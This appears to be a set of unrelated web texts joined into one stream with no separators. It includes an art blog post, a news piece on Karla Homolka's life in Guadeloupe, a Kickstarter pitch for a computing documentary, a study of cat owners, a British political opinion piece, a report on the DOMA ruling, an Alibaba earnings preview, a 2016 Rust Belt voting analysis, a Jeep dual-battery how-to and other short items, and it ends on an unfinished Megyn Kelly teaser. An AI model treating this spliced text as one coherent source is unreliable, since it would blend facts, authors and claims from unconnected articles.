Hello friends , today we have a brand-new inspiration article featuring the work of La Iguana , an amazing artist whose work is characterized by a great use of color and lots of experimentation in all her pieces . Her work displays an amount of detail that can not be easily achieved unless you know exactly what you 're doing . Thereby , due those brilliant technical skills and the beautiful things she makes , we have decided to dedicate our latest article in Mishës to this brilliant artist , enjoy it ! .
What do you think about La Iguana 's work ? , if you like what you saw you can visit her portfolio and Flickr to find out more of her amazing work , do n't forget to leave us your comments and we 'll see you in our next article , bye ! .
From our archives . This article was originally published in 2012 . For a more recent piece about Ms. Homolka 's whereabouts , please read : Homolka back in Canada , sister tells Magnotta trial
Tanned , slimmer but still wary of strangers , Karla Homolka now has three children and lives in Guadeloupe under the name Leanne Bordelais , says a new book by journalist Paula Todd , who met the notorious former convict at her new home .
The book is the first confirmation of previous , sketchier news reports that Ms. Homolka married her lawyer 's brother , gave birth and moved to the French Caribbean island to escape public scrutiny .
Story continues below advertisement
She had lived in Quebec following her 2005 release from a 12-year sentence for her role in the lurid sex killings of two Ontario schoolgirls and the drug-induced death of her sister Tammy .
Ms. Todd wrote that she found Ms. Homolka in a small apartment with her new spouse , Thierry Bordelais , and their three small children , a girl and two boys .
`` Does the woman who killed three children now have three of her own ? The irony comes crashing in , '' Ms. Todd wrote in the book , Finding Karla : How I Tracked Down an Elusive Serial Child Killer and Discovered a Mother of Three , which is to be released in electronic format Thursday afternoon .
The encounter took place this spring , the day after Ms. Homolka turned 42 , meaning on May 5 . After exploring a remote Guadeloupe area where she believed Ms. Homolka had relocated , Ms. Todd wrote that she found herself on a gravel sideroad , staring at a mailbox that said `` Leanne Bordelais . ''
Beyond the mailbox was a fenced apartment building . On the second floor , `` I look through it into a tiny , tidy kitchen . There , bent over the sink , is a petite woman with light hair . She turns her face sideways to see who 's arriving . Then she freezes ...
`` I have found Karla Homolka , and I 'm not sure which of us is more shocked . ''
Mr. Bordelais wanted Ms. Todd to leave but Ms. Homolka , though distrustful , was not outright dismissive and took her visitor to another room and quizzed her .
Story continues below advertisement
Story continues below advertisement
Ms. Todd explained that , as a journalist and lawyer , she wanted to research her life after prison .
`` Why should I trust you ? I have everything to lose , '' Ms. Homolka replied .
When Ms. Todd tried to make small talk , saying that her host seemed to be a good mother , Ms. Homolka snapped back , `` That 's funny that you think you can judge that after seeing me this short time . ''
Despite Ms. Homolka 's caginess , she kept her visitor for an hour . `` I 'd say she was lonely and slightly bored , '' Ms. Todd said .
Mr. Bordelais reappeared , however , holding a phone with their lawyer on the line , ending the conversation before Ms. Homolka had made any substantive remark .
The book said that Ms. Homolka at that point made a slip that confirmed previous speculations that Mr. Bordelais is the brother of her long-time prison lawyer , Sylvie Bordelais .
Story continues below advertisement
Ms. Homolka ended the meeting , refusing to comment further . `` Nobody cares , and everything I 've said is off the record , '' she told Ms. Todd .
Formerly married to the sex predator Paul Bernardo , Ms. Homolka was released from prison after serving her entire sentence in the deaths of Kristen French and Leslie Mahaffy in the 1990s . She settled in Quebec , hoping that she was less known among francophones .
She changed her name to Karla Leanne Teale but reporters twice retraced her , at a suburban hardware store where she worked , then near an apartment in east-end Montreal . By 2007 , the TVA television network reported that she had left for the Caribbean .
The ebook is available on Kobo , Kindle Singles , iBooks and Nook .
I need your help in telling a story , the story of the technology that has changed humanity : computing .
Why Is Computing Important ?
Because the story of computing is the story of humanity .
Computing is a story of ambition , passion , invention , creativity , vision , avarice , and serendipity , powered by a refusal to accept the limits of our bodies and our minds . From the abacus to the iPad , from Gutenberg to Google , from Enigma to GPS , we have created computers to count the uncountable , remember beyond our own experiences , and see the invisible as well as the unforeseeable . To explore computing is the 21st Century equivalent of Cousteau exploring the sea , of Hughes exploring modern art , and of Burns exploring the American experience through the Civil War , baseball , and jazz .
In just one or two generations – an imperceptible time in the timeless sweep of the universe – we have created a technology that has the power to extend us , to transform us , to define us , perhaps even to destroy us .
Just think about it : there is practically nothing you see or do in your daily life that is NOT created , supported , delivered or impacted by computing .
Including reading this proposal . That meal you just ate ? The typical carrot travels 1600 miles from farm to fork – involving computing that created a healthier seed , the supply chain software that tracked the delivery truck , the intelligent devices embedded in the supermarket refrigerator that kept it fresh for you , the car you drove to pick it up that contains more lines of software code than a jet fighter . Computing has irreversibly changed the human experience .
Just as Carl Sagan 's Cosmos made the universe understandable and exciting to a mass audience twenty-five years ago ( was it really that long ago ? ) Computing : The Human Experience will inform , inspire , and entertain . We will grab audiences of all ages by the throat and/or brain by telling the story of this incredibly technology that is changing our world…while changing humanity .
How Will We Tell The Story Of Computing ?
Computing will eventually become a multi-part documentary series . It will be broadcast ( via traditional media as well as web streaming , if all goes as planned ) , but also online : on your iPad in an interactive format ; as an e-book on your Kindle or phone ; as a social network and website , getting people connected to their interests and to each other ; as a series of educational games for kids and teens ; and as a platform for getting more girls and minorities excited about becoming our next generation 's Mark Zuckerberg-ses and Steve Jobs-es .
So , yes , while Computing will teach the essential science of computing , its main focus is on making us all THINK about our relationship to controlling or being controlled by our own future and our own creations . And that 's something no documentary project in this subject area has ever done ( and certainly not with the insider-insights , interactivity , and attitude we plan ) .
Why Do We Want Your Collaboration ?
If our project were instead Keeping Up With The Housewives Who Survived Dancing With The Ice Truck Drivers , we 'd probably be greenlighted in a New York minute and be spending our fortunes supporting other Kickstarter projects . But , getting a project of this scope and ( well , we 'll just go ahead and say it ) depth , can be very , very , very challenging .
Very . Very . Challenging .
We have a deeper faith in the intelligence of the public : we will produce a thoughtful , provocative , and entertaining documentary on the co-evolution of computing and humanity .
But , we need your help in kickstarting the Powers-That-Be-Who-Make-Television to help THEM make that all-important creative leap of faith . We need to push the envelope of what it means to broadcast a documentary of this form to a massive global audience using the Web as well as traditional broadcast media . We need to convince the various foundations and other individual financial contributors that we are serious and that we have the chops and the team and the talent to pull this off . We need to show them all - in a way they totally understand - that Computing is distinctly not a boring technical video of talking heads , but that it is really the unbelievable , exciting , provocative story of humanity 's ongoing fight between extending and not surrendering ourselves to our digital doppelgangers .
In other words , what we are doing here is creating the initial material that proves just how fascinating , jaw-dropping , and cool Computing really is .
Very . Wickedly . Cool .
We have been developing this project for almost four years now . But , we need a kick to help us take this to the next level . And that 's why we need you .
Where Do We Stand As Of Now ?
We 've come a long way in those four years . We have established the basic themes and structure for the series ; we have drafted an outline for the Computing book ; we 've formed our creative team and our advisory board ; we have a teaser script written and a production team lined up ; we 've several major production grants in progress .
But we are not where we 'd like to be : we are ready to produce the teaser ( which is necessary for completing our grant work and in other fundraising activities ) ; we have some basic research to conduct ; we have interviews to carry out ; we have research assistants at the ready to go forth and help with story development .
We need a kickstart .
What Support Do We Need Right Now ?
We seek $ 25,000 ( a bargain ! ) to create some initial materials that will be used to introduce Computing : The Human Experience to the appropriate movers and shakers – as well as the general public . These materials will also prime the pump in a way that will help us gain traction and critical momentum ( i.e. , critical funding ) from visionary foundations , individuals and institutions .
What Will We Do ?
There are three things we 'll do with this $ 25,000 :
1 . We will launch a lecture series on each of the various topics we intend to explore in the broadcast series . We have architected a full set of talks , such as Woven On The Loom Of Sorrow ( about computing and war ) , Deus ex Machina ( about computing as a companion as well as a challenge to faith ) , The Incredible Lightness of Being ( computing and the extension of the human body through games , virtual worlds , artificial organs , and robotics ) and several others . We need funding to cover the costs of development , travel , and recording . We expect to be able to make these lectures available publicly via the Web and traditional broadcast mediums .
How does this help ? The Computer History Museum in Mountain View California has offered to host these talks and to video record them . The museum has a relationship with a local PBS station and their vision thought is that if they can get these talks broadcast on PBS that it will begin to get me known to a larger audience and demonstrate that I have a on film presence and personality that will sell .
2 . We will kickstart the development of a book ( in dead tree format as well as media-rich ebook form ) on Computing . We need funding to obtain research materials .
How does this help ? I have written several best selling books . To put this story into a print format will demonstrate that the story is there , that it is engaging and it is worth telling . Once again , this book will create a wider , global audience for my work ( which up until now has been directed to a professional , technical audience ) .
3 . We will further develop our Web presence , especially with regard to the production of a series of videos ( in the spirit of the Khan Academy ) that teach , present , examine , and contemplate the science and the stories and the future of computing . We need funding to cover basic production costs . This site and these videos will be made public .
How does this help ? The “ Ask Grady ” series of YouTube videos will give the general public the opportunity to ask questions about computing . Once again this gives us greater exposure to the general public and begins to engage them in a dialogue about computing .
What Will We Do If We Get More Than $ 25,000 ?
We will do a happy dance . We might even put it on YouTube . Then :
4 . If we reach $ 50,000 , we will create a timeline app that presents the important people , events , and inventions in the history of computing . We 've done the research , we 've got the materials ; now we just need to make it real .
How does this help ? This creates added visibility , delivers the results of some of our research to the public , and also creates an income stream that will help support the future work of creating Computing The Human Experience .
5 . If we reach $ 75,000 , we can do all that plus we will produce a seven minute teaser that introduces Computing . We already have a script , we 've identified our locations , and we even have a producer and production team at the ready . We just need the dollars ( $ 50,000 , to be precise ) to make it so .
How does this help ? Most of the grants we are pursuing require a sample DVD to be submitted as part of the grant proposal . This DVD will illustrate the style and voice for the project as a whole and also demonstrates that we can create interesting video content . Getting these grants is the path to make this project a reality .
6 . And there 's so much more we are ready to do : we 'll commission a composer ; we 'll engage research assistants ; we 'll start conducting interviews ; we 'll begin to scout locations .
And we 'll continue with our series of happy dances .
In all , we expect Computing to be a $ 10 million-ish project . We 've self-funded this work the past four years . But , it takes money to make money , and we need a kick to get us to the next level .
Who Are We ?
I am Grady Booch an IBM Fellow , co-creator of UML and Object Oriented Programming - and general braniac and onscreen presenter/host . I know that I can not do a project this big by myself and so I have gathered around me other people smarter and more creative than me . My wife Jan is a theologian and psychotherapist ; she is my co-creator and advisor whose job is to keep it real . Seth Friedman is an award-winning writer and creative director ; he is our co-creator and scriptwriter .
You can read about us here : http : //computingthehumanexperience.com/public/ ? page_id=68 .
I have also gathered an advisory board that includes the father of the internet , the world 's leading historians of computing , the curators of a number of museums , and leading thinkers from various universities . We are also in the process of expanding this board to include luminaries from science , society , industry , government , the arts , and religion .
You can read about them here : http : //computingthehumanexperience.com/public/ ? page_id=70
Why Will We Be Successful ?
There 's a story inside of me that 's fighting to get out and to be shared with the world . I am ready to focus the next three years of my professional life on telling that story . I have assembled a world-class team of creative talent to help me , and I am ready to expand my team to make my dream happen .
I just need a bit of a kick to start us on the next phase of this journey .
Join Us In The Journey
The story of computing is the story of humanity : we invite you to join us in the telling of that story . Get in on the ground floor .
Become a part of a project that promises to be truly exciting , surprising , provocative and meaningful .
To find out more detail , please visit our website : http : //computingthehumanexperience.com
Photo : Kirk Mastin/Aurora Photos
Cats—cuddly companions or fine-tuned killing machines ? The answer seems to depend on whether or not you own one .
Ecologists from the University of Exeter and Queen Mary University of London asked cat owners in more than 50 U.K. households if they thought their cats were harmful to wildlife . The team wanted to learn if pointing out the actual toll cats take on the local fauna ( birds , reptiles , and small mammals ) influenced how their owners felt about and managed their pets . The results : It did not .
Owners ' opinions on their kitties ' capacity for killing generally stood unswayed even when faced with hard numbers : as many as 10 kills per month by some cats ( and that 's just observed kills ) . This “ ecological information , ” as the paper , published in Ecology and Evolution earlier this week , soberly puts it , “ is unlikely to alter their attitudes. ” Owners tend to have foggy notion of their cat 's prey tally and often do n't see the hazy figure as a negative . “ Several survey comments seem to suggest that owners see their pets as part of the natural ecosystem , ” the authors write . “ But it 's nature , ” one survey participant pleaded .
Except these “ love sponges ” —Ernest Hemingway 's affectionate name for felines—are n't exactly natural . They 're out in nature because of us . A 2013 study discovered that domestic cats—that includes both pets and feral cats—are likely the single greatest source of human-related U.S. bird and mammal deaths . The study , vastly exceeding previous estimates , suggests that cats kill 1.4 billion to 3.7 billion birds in the lower 48 states every year—more than buildings , vehicles , and poisoning combined .
At the end of the survey , the researchers asked participants what they thought of different cat management plans—namely , keeping them indoors or at least nearby . Most owners were not receptive : 52 percent said they would not try to keep their pet on their property at all times , and 46 percent said they strongly disagreed with the idea . “ My cat chooses for herself whether to stay in or go out , ” one participant wrote on the questionnaire .
Owners seem set on putting their cats first and nature second , the study authors concluded , despite the fact that keeping cats inside benefits both parties : Indoor cats are less likely to be hit by cars , get poisoned , contract diseases , get into fights , or fall victim to predators .
For those owners intent on letting their pets roam free , there 's the BirdsBeSafe cat collar , which , with its bright stripes and jingles , is supposed to make the cat a less effective predator . Avian ecologist and conservation biologist Susan Willson told Audubon the device was “ 100 percent effective ” on her own “ professional killer cat. ” Alas , other owners , worried about burdening or endangering their pet with a collar , are reluctant to consider even this step , valuing their cat 's comfort above conservation—or maybe even conscience .
It was listening to the kids that did it for me . Eighteen years old , first-time voters , idealists to the bone , all of them saying any self-respecting progressive would vote Liberal Democrat . Nick Clegg was the way forward for those interested in radical change . Why ? Because he said so himself . You want those poor banged-up asylum-seeker children released ? Vote Lib Dem . You do n't want higher tuition fees ? Vote Lib Dem . Ditch Trident ? Vote Lib Dem .
My older daughter was beginning to sound like one of those idealists . Hoping to go off to university , fire in her belly , lecturing me on why this lot would make it fairer for people like her . All the way to the ballot box we were n't sure whether she 'd put words into action and actually vote for them . Even the Guardian was at it . Electoral reform , you want a new system , do the only sensible thing , it urged . As if we all woke up in the morning screaming for proportional bloody representation .
I did scream . No , no , no , no , not the Lib Dems , the party that 's for turning at every opportunistic fork in the road . They have history . The campaigns for the Hodge Hill and Leicester South byelections of 2004 revealed a party at home with trying to be all things to all people . In Hodge Hill 's predominantly Muslim Washwood Heath ward , a leaflet featured a picture of Charles Kennedy and candidate Nicola Davies surrounded by Asian voters . In the version of the leaflet distributed in a predominantly white ward , there was n't a brown face to be seen . And in Leicester South , the `` opposed to the war '' candidate billed as Parmjit Singh Gill in largely Muslim areas became `` born and bred '' Leicester man Parmjit Gill in whiter parts of the constituency . Well , if it gains a few votes …
But this is different , chorused the young idealists . Now it 's you who 's the cynic . Cleggy is refreshing , honest , untainted . Look at the way he stands alone , rising above the arguments and vitriol in those televised debates . Every inch his own man . Look at what he says about the Tories : `` There is a gulf in values between myself and David Cameron . They have no progressive reform agenda at all – only an unbearable sense of entitlement that it 's just their time to govern . '' Hurrah for straight speaking .
And then came the corrosive whiff of power . Cameron ? He 's not that bad . University fees ? Anybody 's entitled to change their mind . Welfare state ? Well , dismantling education , health and the benefits system is radical in its own way . And did you see how good Big Dave and I looked on the first day when the sun shone as bright as the Con-Dem future ? And d'you know I was even allowed to lay a wreath at the Cenotaph .
For some people , of course , the fact that he took his party into government for the first time in decades will make Clegg a hero . But not for the believers . They saw him turn . And while with Cameron we knew what we 'd be getting , the Clegg dupes did not . And it 's that the betrayal that really hurts them .
The one personal positive to take from all this : as we walked away from the polling station , my daughter said she had n't fallen for the Lib Dems – she 'd remembered the story of the double dealing . And she 'd discovered Clegg had apparently been a student Tory .
A federal appeals court in Manhattan has ruled that the Defense of Marriage Act is unconstitutional .
STORY : Hip Hip Hooray ! Marriage Equality Will Be In Democratic Party Platform
The 2nd U.S . Circuit Court of Appeals issued its ruling Thursday , upholding a lower court judge who ruled that the 1996 law that defines marriage as involving a man and a woman was unconstitutional .
As reported by the Associated Press :
Chief Judge Dennis Jacobs as part of a three-judge panel says the law violates equal protection . A federal appeals court in Boston earlier this year also found it unconstitutional . Judge Jacobs ' opinion concludes that any law which discriminates against gay men and lesbians should be treated very skeptically under our Constitution : [ W ] e conclude that review of Section 3 of DOMA requires heightened scrutiny . The Supreme Court uses certain factors to decide whether a new classification qualifies as a quasi-suspect class . They include : A ) whether the class has been historically “ subjected to discrimination , ” ; B ) whether the class has a defining characteristic that “ frequently bears [ a ] relation to ability to perform or contribute to society , ” C ) whether the class exhibits “ obvious , immutable , or distinguishing characteristics that define them as a discrete group ; ” and D ) whether the class is “ a minority or politically powerless. ” Immutability and lack of political power are not strictly necessary factors to identify a suspect class . Nevertheless , immutability and political power are indicative , and we consider them here . In this case , all four factors justify heightened scrutiny : A ) homosexuals as a group have historically endured persecution and discrimination ; B ) homosexuality has no relation to aptitude or ability to contribute to society ; C ) homosexuals are a discernible group with non-obvious distinguishing characteristics , especially in the subset of those who enter same-sex marriages ; and D ) the class remains a politically weakened minority .
The issue is expected to be decided by the Supreme Court .
SOURCE : AP
Also On Global Grind :
Welcome to Alley Cat Coffee House , Locally Owned & Operated in Beautiful Fort Collins Colorado !
Alley Cat opened in August of 2003 and has grown to be one the most eclectic Cafe 's in Northern Colorado . The people & atmosphere are welcoming & inviting .. it really has a one of a kind feel . Here at Alley Cat we strive to offer delicious drinks and foods ( made fresh daily ) a unique creative environment & stellar customer service . We are always open & welcome you to join us anytime , day or night . It 's always a great time to come in .
The perfect place for a fresh cup of local coffee on your way to or from work or class , a tasty lunch , in house baked good or snack , good conversation with friends & colleagues , all night studying , internet , a game of Chess or Go , playing a few songs on our in house acoustic guitar…and so much more !
Free wireless internet for customers ! Open 24 hours 7 days a week !
Check our facebook page for specials and news , and our upcoming shows and events .
If you have any questions or comments , please contact us .
Photo by Patrick Messall
Merry Christmas ! 2015 !
Alibaba 's revenue is growing rapidly but earnings are slowing .
Investors are worried about the company and the Chinese economy .
The stock trades at just $ 1 above its 52-week Low .
Alibaba Group Holding Limited ( NYSE : BABA ) is expected to report quarterly earnings on Wednesday , August 12 , 2015 . Seven analysts surveyed by Zacks Investment Research forecast Alibaba earnings to come in at $ 0.41 for the quarter . EPS for the quarter is expected to be about 50 % lower than the same quarter last year , which came in at $ 0.84 per share .
It is noteworthy to see earnings fall substantially while revenue has been steadily climbing at a very fast pace of 45-50 % annually . Previously , earnings nearly tripled from 2013 to 2014 , climbing from $ 1.35 billion to $ 3.71 billion .
Investors have become increasingly concerned that the company will be unable to meet the super fast earnings growth rates it has seen in the past . Starting with the quarterly earnings announced on January 29 , 2015 , the company reported that the monetization growth rate had fallen substantially , a major headwind for future sales growth . The hype when Alibaba went pubic was based on the huge potential of the Chinese economy . However , sentiment has soured considerably in 2015 .
The falling Chinese stock market in recent weeks has added to this sentiment , sparking fears that the entire Chinese economy may be slowing down further . When they report next week , investors will listen to what they have to say , not just about their company , but also about the Chinese economy and the current state of consumer spending .
Last quarter Alibaba beat on revenue and earnings . The stock surged 20 % to $ 95 within 3 weeks before sliding down to a low of $ 76 on July 8 . In spite of continued fast growth in revenue , BABA stock is down 34 % from its 52-week high of $ 120 set on November 13 , 2014 . With the exception of the 3-week surge after last quarter 's earnings report , BABA stock has steadily declined from the 52-week high . Today it is trading at $ 78.80 , just $ 1 above its 52-week low .
Unlike most American companies , Alibaba refuses to give forward guidance . This will likely create additional volatility by decreasing the accuracy of analysts ' estimates .
Yesterday , Alibaba announced that Michael Evans has been appointed President of the company . Evans is a former Goldman Sachs executive who worked with Alibaba to take the company public . He has been an independent director on the company 's board since September 2014 when Goldman managed the company 's initial public offering for a record $ 25 billion . His appointment makes him the most senior foreign executive in the firm .
What we have seen in Alibaba 's stock this year is typical of a high multiple price-to-earnings ratio attached to a growth company . When the company stops growing at fast rates : the stock crashes . Alibaba stock has been beaten up badly and yet continues to show tremendous potential for the future . The Chinese economy has much room for growth with the large population they have . Their economy has plenty of room for development and yet they now have the second-largest economy in the world , second only to the United States .
In addition to other investors , I will be listening carefully to what Alibaba says and the numbers they report next week . Now is a good time to be skeptical and cautious before buying BABA stock .
People line up to cast their ballots at a polling station on Nov. 8 in Flint , Michigan . Nova Safo/AFP/Getty Images
Commentators in charge of explaining Donald Trump 's surprise victory seem to have settled on the idea that the white working class in the Rust Belt played a decisive role . In the New York Times , for example , Thomas Edsall notes that Trump won 14 percent more noncollege whites than Mitt Romney , and that those working-class voters Trump carried by “ huge margins ” were heavily concentrated in the Rust Belt states of Iowa , Michigan , Ohio , Pennsylvania , and Wisconsin ( which we will call the Rust Belt 5 ) .
But this emerging consensus around a Rust Belt revolt is wrong . People like Edsall have missed the real story : Relative to the 2012 election , Democratic support in the Rust Belt collapsed as a huge number of Democrats stayed home or ( to a lesser extent ) voted for a third party . Trump did not really flip white working-class voters in the Rust Belt . Mostly , Democrats lost them .
Our analysis projects publicly accessible exit-poll data for the past two elections onto turnout figures in the Rust Belt 5 , to look at the whole picture , including third-party voters and those staying at home . Here 's what we found .
1 . In the Rust Belt 5 , the GOP 's pickup of voters making $ 50,000 or less is overshadowed by the Democrats ' dramatic loss of voters in that category .
Compared with Republicans ' performance in 2012 , the GOP in the Rust Belt 5 picked up 335,000 additional voters who earned less than $ 50,000 ( +10.6 percent ) . But the Republicans ' gain in this area was nothing compared with the Democrats ' loss of 1.17 million ( -21.7 percent ) voters in the same income category . Likewise , Republicans picked up a measly 26,000 new voters in the $ 50– $ 100K bracket ( +0.7 percent ) , but Democrats lost 379,000 voters in the same bracket ( -11.7 percent ) . The working class is not the only part of this equation . Analysis elsewhere suggests that in states such as Wisconsin , a significant fraction of Democrats ' loss relative to 2012 came from poor districts , and it 's unclear how much voter ID laws affected those numbers .
Shift in absolute votes cast by income and party since 2012 in the Rust Belt 5 . ( Sources : CNN , NYT , US Election Project , US Election Atlas . ) Konstantin Kilibarda and Daria Roithmayr
2 . Republicans in the Rust Belt 5 picked up almost as many wealthy voters making over $ 100,000 as voters who made less than $ 50,000 .
Relative to 2012 , Republicans gained 225,000 voters earning $ 100,000 and over ( +8.1 percent ) . Recall that they gained 335,000 additional working-class voters who earned less than $ 50,000 ( +10.6 % ) . It 's hardly a working-class revolt if wealthy voters are marching together with them , hand in hand . Democrats picked up more wealthy voters , too .
3 . Trump did not flip white voters in the Rust Belt who had supported Obama . Democrats lost them .
Relative to 2012 , Democrats lost 950,000 white voters in the Rust Belt 5 ( -13 percent ) . This figure includes a loss of 770,000 votes cast by white men ( -24.2 percent ) . Compare that number to the modest gains Republicans made in terms of white voters : They picked up only 450,000 whites ( +4.9 percent ) .
Democrats also lost the black , indigenous , and other people of color ( BIPOC ) vote in the Rust Belt 5 , with 400,000 fewer voters in this category ( -11.5 percent ) . While disaggregated exit-poll data on BIPOC voters was inconsistently available across the five states we examined , in those places where numbers were available , Democrats saw losses among both black American and Latino voters . Importantly , some of the greatest losses in BIPOC votes were in states such as Ohio and Wisconsin , both of which adopted voter suppression laws beginning in 2012 . But even in states with no such laws , such as Pennsylvania , BIPOC turnout was significantly lower this election cycle . In short , more people of color stayed home in the Rust Belt in 2016 than in 2012 .
Shift in absolute votes cast by race and party since 2012 in the Rust Belt 5 . ( Sources : CNN , NYT , U.S. Election Project , U.S. Election Atlas . ) Konstantin Kilibarda and Daria Roithmayr
4 . The real story—the one the pundits missed—is that voters who fled the Democrats in the Rust Belt 5 were twice as likely either to vote for a third party or to stay at home than to embrace Trump .
Compared with 2012 , three times as many voters in the Rust Belt who made under $ 100,000 voted for third parties . Twice as many voted for alternative or write-in candidates . Similarly , compared with 2012 , some 500,000 more voters chose to sit out this presidential election . If there was a Rust Belt revolt this year , it was the voters ' flight from both parties .
In short , the story of a white working-class revolt in the Rust Belt just does n't hold up , according to the numbers . In the Rust Belt , Democrats lost 1.35 million voters . Trump picked up less than half , at 590,000 . The rest stayed home or voted for someone other than the major party candidates .
This data suggests that if the Democratic Party wants to win the Rust Belt , it should not go chasing after the white working-class men who voted for Trump . The party should spend its energy figuring out why Democrats lost millions of voters to some other candidate or to abstention . Exit polls do not collect information about why voters stay home . Perhaps it 's time someone asked them .
Dare to defy death in this adventure for the world 's greatest roleplaying game .
The talk of the streets and taverns has all been about the so-called death curse : a wasting disease afflicting everyone who 's ever been raised from the dead . Victims grow thinner and weaker each day , slowly but steadily sliding toward the death they once denied .
When they finally succumb , they ca n't be raised—and neither can anyone else , regardless of whether they 've ever received that miracle in the past . Temples and scholars of divine magic are at a loss to explain a curse that has affected the entire region , and possibly the entire world .
The cause is a necromantic artifact called the Soulmonger , which is located somewhere in Chult , a mysterious peninsula far to the south , ringed with mountains and choked with rainforests .
Adventure design by Christopher Perkins , Will Doyle , and Steve Winter , with additional design by Adam Lee . Story consulting by the award-winning creator of Adventure Time , Pendleton Ward .
Stream of Annihilation : Product Announcement
Where can I buy it ?
Order at your local game store , book stores such as Barnes & Noble , or online at retailers like Amazon .
You can also find Tomb of Annihilation available via Fantasy Grounds and Steam , as well as via Roll20 and D & D Beyond .
Item details
Price : $ 49.95 C $ 65.95
Release Date : 19 September , 2017
Format : Hardcover
ISBN : 9780786966103
Player Handouts
Adventurers League Info
Tomb of Annihilation
Isolated dual batteries are a must in any Overland vehicle . The setup looks complicated and difficult in photos , though it 's actually very simple . Having two batteries means one can be used only to start the vehicle ( let 's call this battery the “ Engine Battery ” ) and the other can be used for all your electrical needs like a fridge , camp lights , charging of devices , running an inverted etc . ( Let 's call this battery the “ House Battery ” ) . The isolation part refers to how the batteries are connected and disconnected with the engine is running and when the engine is not .
When the engine is running , we want the batteries to be connected in parallel ( positive to positive , negative to negative ) so we still get 12V , and the alternator can charge both batteries .
When the engine is not running , we want to separate the batteries , so that if the House Battery is completely discharged , the Engine Battery remains unaffected and will still start the vehicle engine without issue .
This “ isolator ” is commonly a large amperage solenoid that is triggered with an ignition hot wire .
Things To Consider
Because the two batteries will be connected in parallel when the engine is running , it 's highly recommended to use two identical batteries to ensure even charging from the alternator .
A cheap solenoid might save $ 30 now , though given it 's the fundamental piece of the puzzle , I recommend buying a good one that will last a very long time
The system described here does nothing to prevent excessive discharging of the House Battery – if you leave multiple big camp lights on overnight , your house battery will completely discharge , which is usually not good for the longevity of the battery . Make sure you turn your electronics off , and/or buy devices with a voltage cutoff ( i.e . my Dometic CFX-35 Fridge . From $ 899.99 From CDN $ 1244.15 on Amazon
Things To Buy
Tools Needed
Only basic tools , though the specifics will depend on which dual battery try you use . You really wo n't need more than a ratchet and extension bar , a few sockets ( at least 1/2 inch and 10mm ) , some kind of saw to cut plastic ( hand or electric is fine ) .
A deep 10mm socket is handy .
Step 1 :
Follow the instructions that came with your dual battery tray to remove your existing battery and the large factory plastic tray , and install the new dual battery tray . Usually this involves cutting the factory plastic tray .
Step 2 :
Install the two batteries in the tray – when using the Nemesis Industries tray it 's recommended to install the Hose Battery on the bottom , and the Engine Battery on the top . If your tray mounts the batteries side-by-side or front-and-back , check how well the stock jeep wires for the positive and negative will reach each location . Whichever battery suits those wires the best can be your Engine Battery .
Step 3 :
Connect the negative terminal of both batteries directly together . These will always be connected with large gauge wire , and never need to be disconnected .
Step 4 :
Find a good spot to mount the solenoid . You 're going to run heavy positive wires to the large terminals from each battery , so keep it close to the batteries . Check hood clearance , and make sure neither terminal will touch any part of the body nor hood .
Step 5 :
Install the inline fuse/wire in the JK fuse block in the location indicated on the picture below . This will trigger the solenoid to turn on when the engine is running . Drill a hole just big enough for the wire in the bottom/side of the JK fuse block cover , feed the wire through and put silicon around it to seal the hole from dust and water .
Connect the other end to the small trigger terminal on the solenoid .
Step 6 :
Connect the other small terminal on the solenoid to an earth – this could be the negative of either battery , or the body of the Jeep . Remember , they 're all connected together now , all the tire , so it does n't matter what you use , it 's all the same thing .
Step 7 :
Connect one heavy gauge red wire onto the positive of each battery , and to each of the large terminals on the solenoid .
Step 8 :
Connect all your accessories ( fridge , lights , etc ) to the House Battery positive and negative .
Step 9 :
Connect all the stock Jeep wires onto the Engine Battery positive , and then lastly connect the stock Jeep wires to the negative of the Engine Battery . Leaving the negative until last ensures you wo n't get a really big spark if you accidentally touch something to the body during the whole setup .
Step 10 :
Zip tie like wires together and out of the way , and attempt to make everything as neat as possible , which is not easy .
Step 11 :
Test out your new isolated dual battery setup – When you start the engine you will hear a “ clunk ” as the solenoid connects the two batteries . You will hear the same “ clunk ” when you turn the engine off again .
Enjoy hours of lights and icy cold beverages without worry of draining your Engine Battery !
-Dan
The University of Minnesota is ready to make beer and wine sales a permanent fixture at Gopher football games .
After a two-year experiment , university officials found `` no significant increase '' in alcohol-related incidents at TCF Bank Stadium , according to a report this week to the Board of Regents . In fact , there were fewer police calls about rowdy or drunken fans in 2013 than in 2010 , two years before the on-site beer and wine sales began .
`` It really has not been the problem that some might have expected it would be , '' Vice President Pamela Wheelock said .
University officials , who had once resisted the idea of alcohol sales because of concerns about student drinking , now say that they want to continue the sales after the pilot project expires in July . The plan would require legislative approval .
`` It seems to be a success , '' Wheelock said .
Last fall , police reported 59 alcohol-related incidents at the stadium , compared with 77 in 2010 . In 2011 , the year before alcohol sales began , 57 incidents were reported .
Before and After Alcohol-related incidents 77 in 2010 59 in 2013
`` There was no significant increase in problem behavior , '' Wheelock said . In light of that experience , she added , `` we 're fine making this work . ''
The university took in $ 181,678 as its share of the profits on just over $ 1 million in beer and wine sales during the 2013 season , according to the report .
In March , after the first season , the university initially reported a $ 15,000 loss on alcohol sales because of high start-up costs . But after renegotiating its contract with the vendor , the university ended up with $ 21,118 in net profits for 2012 , Wheelock said . The funds go to the university 's athletics program .
Wheelock said there are no plans to add hard liquor , or expand beer and wine sales at other venues . The university allows limited sales in the `` club areas '' of Mariucci Arena and Williams Arena , but not in general seating .
The issue of alcohol sales had been a hot-button issue since TCF Bank Stadium opened in 2009 . Initially , the university wanted to limit alcohol sales to `` premium seats , '' in order to keep it away from students . But legislators objected , insisting that fans in all parts of the stadium should have equal access .
In 2012 , the university agreed to a two-year pilot test . It allowed wine and beer sales at three designated locations at the football stadium , starting an hour before kickoff and stopping at the end of halftime .
The feedback from fans , Wheelock said , has been `` pretty positive . ''
Wheelock said the university took extra steps to prevent potential problems , including limiting purchases to two beverages per customer and training the sales staff `` in identifying issues of overconsumption and intoxication . '' It also stepped up security .
The report concluded that the alcohol sales had no negative effect on surrounding neighborhoods , in part because of increased police presence on game days .
At the same time , the university report notes that college drinking has always been a problem nationwide , especially on game days . And that 's true whether or not alcohol is sold on site .
`` So often , '' Wheelock said , `` it relates to people 's behavior even before they come into the building . ''
Now that we 're into the primary debate season for the 2016 Presidential race , Fox 's Megyn Kelly says she 's ready and fired up to moderate the GOP debate this Thursday . And while I 'm sure that Ms. Kelly has been working long and hard to come up with the perfect Fox-style questions , it seems that Twitter has enthusiastically decided to help her out with some brilliant suggestions of their own .
Here 's just a few examples… .
